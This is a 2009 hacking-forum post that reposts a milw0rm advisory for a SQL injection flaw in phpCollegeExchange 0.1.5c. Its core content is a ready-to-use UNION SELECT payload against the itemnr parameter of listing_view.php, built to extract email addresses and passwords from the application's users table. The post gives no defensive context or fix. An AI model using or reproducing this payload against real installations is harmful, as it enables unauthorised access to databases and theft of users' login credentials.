Multi Ethnic Hacking Group


    phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln

    Post by Foxi on Wed Jul 08, 2009 4:20 am

    Code:
    #################################################################################################################
    [+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
    [+] Discovered By SirGod
    [+] www.mortal-team.org
    #################################################################################################################

    [+] Script homepage : http://phpcollegeex.sourceforge.net/

    [+] SQL Injection

      http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--

    #################################################################################################################

    # milw0rm.com [2009-06-15]


      Current date/time is Sun Sep 24, 2017 5:38 pm